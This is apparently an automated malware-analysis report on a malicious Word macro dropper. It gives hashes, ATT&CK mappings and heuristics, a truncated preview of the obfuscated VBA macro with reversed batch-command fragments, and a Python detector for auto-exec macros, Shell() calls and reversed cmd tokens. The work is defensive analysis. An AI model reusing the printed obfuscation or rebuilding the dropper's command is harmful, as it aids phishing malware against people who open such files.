Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30309185cb8b9426…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 196.5 KB
Created: 2018-02-26 14:33:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 7aaead5720dcd59f437df010e0f44dc2
SHA-1: 4892c31898c439b9bbafa4ee696c25cce7f46067
SHA-256: 30309185cb8b9426b4fb795fd56b4b59b374e1eb68b87226972191fb28f2e7c9
Risk Score: 204

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word (OLE) document that carries a VBA project. OLE_VBA_AUTOOPEN and OLE_VBA_SHELL fire together, meaning the macro has an entry point that runs as soon as the document is opened with macros enabled and a Shell() sink that can launch an external command from it; after the macro-enable click no further user interaction is needed (T1204.002 followed by T1059.005). The decoded macro source (macros.bas) is heavily obfuscated: dead arithmetic on undeclared variables, On Error Resume Next in every routine shown, and command-line fragments stored backwards in string literals (for example "% tes&&" reads "&&set %" and "%2rav%" reads "%var2%" when reversed, i.e. cmd.exe batch syntax with environment-variable indirection). That is consistent with the ClamAV Doc.Dropper.Agent-6457486-0 classification of a dropper, although the final command or payload location is not recovered statically here; the only URL found is an XML namespace. The presence of macros.bas is the extraction result, not evidence in itself. One caveat: the OLE_LEGACY_WORDBASIC_AUTOEXEC description says no modern VBA project was recovered, which is contradicted by the olevba extraction below; treat that line as the heuristic's generic wording, not as a finding about this sample.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6457486-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6457486-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace URI that Office writes into document markup; it is benign and should not be treated as a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 62833 bytes
SHA-256: babf00914039e694307da8abc1b221d53d17c60d1a6620153d4f5a0c2764b854
Detection
ClamAV: No threats found (the Doc.Dropper.Agent-6457486-0 signature matched the parent OLE file, not the decoded macro text, so a clean result on this carved file does not lower the verdict)
Obfuscation or payload: likely
Carved artifact contains 30 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "PwziujTfp"
Sub ABbjLh(jzUZnCW)
   On Error Resume Next
   Dim TnRzjt()
   ReDim jcDLawt(2)
   mUtFm(0) = 186042
   VWzlKcTsbuaVb(1) = 8745430
   hGNpU = Loo - 9768715
   zHMpwiFuwk = 1482312 * 4763798
End Sub
Function bplDlcUjMrj()
On Error Resume Next
qWrihMAw = "WrnPWvjkSNYUiSpJcuvOISMKQD%3rav%t"
khFFu = oophdWzuY = aJcaBfTXlwt = (1294587 / MCmsfrLGLwBPI + 6738043 * SdTMq * (9017016 / DCkltUviEiivdi / 8339068 - Tan(SDMYPKaKsw / CBool(EIdhQzNz / 6940133 / twqLju))))
EULibDzk = XhMFYazAJ = VjsbZtwErW = (5097373 / RwPiHWZEWNiQDc + 6020661 * siJcYmbdHIizB * (7452837 / KUaPOqtT / 5527048 - Tan(EHIBbXwOGL / CBool(MzYfWmX / 9744913 / ZDjtXwdNQAwK))))
JQPBruZZRtK = gjHBjhbyuf(qWrihMAw, 2, 6)
DVozWiuzOuZ = "WsbRTlsOntld% tes&&!%2rav%!=%8k"
ddzkYHBZDP = uzNrYzBTu = IzfthCwiElY = (8138226 / rtWvMidrcb + 1888411 * sfminMaVtzGo * (2552482 / HlikMOETWwBEo / 7796969 - Tan(qfYVFoWM / CBool(RZzVk / 8937613 / ihUWsNrPvjZJ))))
JTpvKLli = ohiXmECRi = IDkZiTnQ = (6781359 / bKSWURYdoIZ + 4079802 * NXSjBLRh * (5615001 / PZQmT / 6694749 - Tan(bfApidOLC / CBool(fYcZtmoX / 316500 / klESBwF))))
IdBIowifGRz = gjHBjhbyuf(DVozWiuzOuZ, 2, 18)
uwcviiKlFFZ = "kzKqUrLXlNwRGViw% tes&q"
OZYIzNYXs = CumzdDVXl = jBfjbz = (7340989 / BkKUMJn + 1906371 * OuiGBmFjrJXQG * (6092283 / aZFkromZXE / 4979778 - Tan(EhicKTNG / CBool(HziPawknOw / 9109831 / funDC))))
fSELvBXcauM = SBcVHCbSB = JjNws = (4764378 / TaXVQ + 8329093 * lJHiO * (4804353 / vYHBMiHAwGzZ / 9042006 - Tan(HAACjdaMjh / CBool(Kajzu / 9357426 / cNOHF))))
QEAcQAJYZ = gjHBjhbyuf(uwcviiKlFFZ, 2, 10)
mFTkVjEMc = "GHmsjiFaRSCrqtA% tescDkhmsnh"
hwVaYO = QjjkQKrvM = HJdQwjbcmPZTw = (6108394 / NGqlEDMQHcii + 8737013 * rNBzNsTnYoUqkc * (4991552 / zkAwDDAJIousWn / 3066620 - Tan(hfvBY / CBool(imTZiBRN / 3643688 / rKfwiusnMrqZ))))
rqWhnTPsRiQ = waRkYTIEh = ZdBNfiVzs = (9146293 / JBLIRTnnH + 7861447 * dJosHwczEOD * (3596670 / CzUPORNzvDoY / 1146602 - Tan(HAVRZjszrZ / CBool(WWWvqGGiaFTw / 4577536 / pbhiFzTBW))))
ltVsvUrMuD = gjHBjhbyuf(mFTkVjEMc, 9, 12)
KObawI = "NjpXv%!!%3rav%!!%8raJarvfjaczpinMkwM"
GJzkG = cIowBUDWG = YBRrilKAtXh = (4251518 / nafFwir + 1236977 * zzsNV * (4629721 / VBZjXRuDjQRCn / 5948549 - Tan(GGwBYW / CBool(HnObVCT / 9866287 / QmHXVHpnV))))
DpijauaTqH = fcVjRpSXo = mQTzWGulRwvsj = (6950698 / BQfHowQIftttbW + 4867325 * wNbMEw * (7396643 / RbWXrZmslkPZ / 7512368 - Tan(AtVHoGdM / CBool(OsoziHXq / 941982 / vpNcsRFGBI))))
QIowZdwd = gjHBjhbyuf(KObawI, 17, 16)
lGqtWiq = "ZKnTuLIfU !%6rav%!!%5rI"
PsZNEzBwCW = HRmXRHjYW = iQIFMvhGYQ = (8313381 / zfTfVqAmw + 8984366 * zEQNq * (6361306 / GJZnwpsFwkiiQt / 218326 - Tan(SGEmlsYjckNL / CBool(whrYb / 1816242 / wLjdmQsPHQi))))
YalTu = KwTzGlvMO = qLMbjECCnJpj = (3800200 / HXazUAIbMFDP + 6359402 * aFdPvvGAXCFLqN * (3930053 / oacipj / 2010474 - Tan(rNcOwGYRXDbhfZ / CBool(XiHAYtJJvHFR / 5559832 / CJrviYhTrBQd))))
NtYno = gjHBjhbyuf(lGqtWiq, 2, 13)
wVmCM = "DMNFpoLY&wo=%2rav% tesWlC"
JYLjfo = wITkduPzs = dLEZYZOCChwd = (8472357 / wLGMTQwuPN + 4001987 * IfhjCIGT * (6697446 / zClukmIACUQp / 7250321 - Tan(oDibqjvq / CBool(EQiUT / 6000704 / XYvMNDaZjLlPK))))
JRzhG = zDTuPuzii = zpHzhdCSpU = (2405649 / rtYFkcEvizjfFA + 9436503 * FYjMtvvWGFsv * (5752764 / wuwCMZVKKWZiw / 296311 - Tan(bshjOM / CBool(oADwwBwi / 6935646 / RkBlhC))))
VRkzwtdoudA = gjHBjhbyuf(wVmCM, 4, 14)
FNPaw = "mzbAHoiXiJKDSVjGWSKVNvFAGPEqUFv% tes&&OwDnsCKbQpmN"
kvJwsj = whTGrAQJw = tEmhouEzwHY = (3863135 / VKwiYQwZlzuYh + 1543670 * sFzOjHUJ * (7044605 / VjmLnMocoww / 8642987 - Tan(rsAKHFsJG / CBool(kGtIKnlBBOwD / 6444683 / OwnFwtJ))))
GczwKMUjB = XzjIVfzMD = YOwCEtEioDzvi = (4944329 / LpwJSmMNcNHJ + 8928 * IoozWXpkJJEj * (5348434 / pMbUJT / 2071893 - Tan(ADlFMATozkDpj / CBool(IwICzaf / 7452487 / jKFXQ))))
rNDWzFNC = gjHBjhbyuf(FNPaw, 8, 13)
XCLAjHN = "TAMUmCqzp
... (truncated)
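The checks named in the heuristics list (an auto-execution entry point, a Shell() sink, long base64-like literals) and the reversed-string pattern visible in the macro preview, written out as an added Python example; this is not the report generator's code or oletools. The sample input reuses a few literal lines from the preview above, but the AutoOpen/Shell stub in it is constructed because the preview is truncated before those routines, and the batch tokens searched for are an assumption drawn from reading the fragments backwards, not strings recovered from the sample.

```python
import base64
import re
from typing import Dict, List

# Constructed test input: a few lines copied from the macros.bas preview on
# this page, plus a constructed AutoOpen stub standing in for the truncated
# part of the macro (the report says AutoOpen and Shell() are present but the
# preview stops before them, so the stub is an assumption, not sample code).
SAMPLE_VBA = r'''
Attribute VB_Name = "PwziujTfp"
Sub ABbjLh(jzUZnCW)
   On Error Resume Next
   zHMpwiFuwk = 1482312 * 4763798
End Sub
Function bplDlcUjMrj()
On Error Resume Next
qWrihMAw = "WrnPWvjkSNYUiSpJcuvOISMKQD%3rav%t"
DVozWiuzOuZ = "WsbRTlsOntld% tes&&!%2rav%!=%8k"
wVmCM = "DMNFpoLY&wo=%2rav% tesWlC"
FNPaw = "mzbAHoiXiJKDSVjGWSKVNvFAGPEqUFv% tes&&OwDnsCKbQpmN"
End Function
Sub AutoOpen()
    ' constructed stand-in: the real body is not shown on the page
    x = Shell(bplDlcUjMrj(), 0)
End Sub
'''

# Constructed line holding a long base64 literal, to exercise the blob check.
CONSTRUCTED_BLOB_LINE = 'p = "' + base64.b64encode(b"constructed" * 8).decode() + '"'

AUTO_EXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+"
    r"(AutoOpen|Auto_Open|AutoExec|AutoClose|Document_Open|Document_Close|Workbook_Open)\b",
    re.IGNORECASE | re.MULTILINE,
)
SHELL_RE = re.compile(
    r'\bShell\s*\(|CreateObject\s*\(\s*"(?:WScript\.Shell|Shell\.Application)"',
    re.IGNORECASE,
)
STRING_LITERAL_RE = re.compile(r'"([^"\n]*)"')
BASE64_BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
# Batch syntax expected to surface once a reversed literal is read forwards
# (assumed from the preview fragments; patterns, not the sample's own strings).
BATCH_TOKENS = ("set %", r"%var\d+%", "&&", "cmd", "/c", "powershell")


def find_auto_exec(vba: str) -> List[str]:
    """Auto-execution entry points (what OLE_VBA_AUTOOPEN keys on)."""
    return [m.group(1) for m in AUTO_EXEC_RE.finditer(vba)]


def count_shell_calls(vba: str) -> int:
    """Execution sinks such as Shell() (what OLE_VBA_SHELL keys on)."""
    return len(SHELL_RE.findall(vba))


def count_base64_blobs(vba: str) -> int:
    """String literals long and clean enough to be encoded payloads."""
    return sum(1 for m in STRING_LITERAL_RE.finditer(vba)
               if BASE64_BLOB_RE.match(m.group(1)))


def reversed_batch_literals(vba: str) -> List[Dict[str, object]]:
    """Literals whose reversed text contains cmd.exe batch syntax.

    In the preview, '% tes&&' reads '&&set %' backwards and '%2rav%' reads
    '%var2%', so the macro stores its command line in reversed pieces.
    """
    hits = []
    for m in STRING_LITERAL_RE.finditer(vba):
        literal = m.group(1)
        rev = literal[::-1]
        tokens = [t for t in BATCH_TOKENS if re.search(t, rev, re.IGNORECASE)]
        if tokens:
            hits.append({"literal": literal, "reversed": rev, "tokens": tokens})
    return hits


def triage(vba: str) -> Dict[str, object]:
    """Combine the checks into one verdict, loosely following the report's severities."""
    auto_exec = find_auto_exec(vba)
    shells = count_shell_calls(vba)
    blobs = count_base64_blobs(vba)
    reversed_hits = reversed_batch_literals(vba)
    if auto_exec and shells:
        risk = "critical"   # command execution as soon as the document opens
    elif auto_exec or shells:
        risk = "high"
    elif blobs or reversed_hits:
        risk = "medium"
    else:
        risk = "low"
    return {"auto_exec": auto_exec, "shell_calls": shells,
            "base64_blobs": blobs, "reversed_literals": reversed_hits,
            "risk": risk}
```

Run `triage(SAMPLE_VBA)` on the constructed input and it returns risk "critical" with AutoOpen as the entry point, one Shell() sink and four literals that turn into batch syntax when reversed; feeding it olevba's real `macros.bas` output instead of the constructed sample is the intended use. The reversed-literal check is the one worth keeping around: it is cheap, it survives identifier renaming, and it points straight at the strings to concatenate when reconstructing the command line by hand.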